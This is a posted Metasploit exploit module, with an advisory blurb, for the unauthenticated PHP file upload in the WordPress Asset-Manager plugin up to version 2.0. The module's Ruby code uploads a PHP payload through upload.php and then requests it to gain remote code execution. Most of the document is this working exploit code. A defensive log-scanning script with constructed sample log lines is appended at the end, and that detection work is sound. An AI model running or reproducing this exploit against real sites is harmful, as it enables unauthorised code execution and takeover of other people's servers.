WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP files to be uploaded: a user can upload a file to a temp directory without any authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']),
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin's upload.php reads the
    # uploaded file from the "Filedata" form field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands in a web-accessible temp directory; requesting it runs it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
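As an added example (not part of the original post or of the Metasploit module above), the following Ruby script scans Apache access-log lines for the two-step pattern this module leaves behind: a POST to the plugin's upload.php followed, from the same client, by a GET for a .php file under wp-content/uploads/assets/temp/. The sample log lines, the /wordpress prefix and the 300-second correlation window are constructed assumptions.

```ruby
require 'time'

# Paths the vulnerable plugin exposes: the unauthenticated upload handler and
# the web-accessible temp directory it writes into (assumed WordPress prefix).
UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/[^/\s?]+\.php}

# Apache "combined" log line: client IP, timestamp, request line, status code.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

LogEntry = Struct.new(:ip, :time, :method, :path, :status)

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  LogEntry.new(m[:ip], Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
               m[:method], m[:path], m[:status].to_i)
end

# One finding per client that POSTed to upload.php. Severity is "high" when the
# same client then fetched a .php file from the temp directory within `window`
# seconds (upload followed by execution), "medium" for the upload alone, which
# the plugin should never accept without authentication anyway.
def find_upload_abuse(lines, window: 300)
  entries = lines.map { |l| parse_line(l) }.compact
  findings = []
  entries.group_by(&:ip).each do |ip, evs|
    uploads = evs.select { |e| e.method == 'POST' && e.path =~ UPLOAD_PATH }
    next if uploads.empty?
    execs = evs.select do |e|
      e.method == 'GET' && e.path =~ TEMP_PHP &&
        uploads.any? { |u| e.time >= u.time && e.time - u.time <= window }
    end
    findings << { ip: ip,
                  severity: execs.empty? ? 'medium' : 'high',
                  uploads: uploads.size,
                  executed: execs.map(&:path) }
  end
  findings
end

# Constructed sample log (not real traffic): one client uploads and then runs a
# file; another only fetches an image from the same directory.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [26/May/2012:10:01:12 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.5 - - [26/May/2012:10:01:15 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"
  203.0.113.5 - - [26/May/2012:10:01:16 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzvb.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [26/May/2012:10:05:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"
LOG
```

Call find_upload_abuse(File.readlines('access.log')) to run it over a real log; each finding lists the client, the number of upload POSTs and any temp-directory .php paths it then requested.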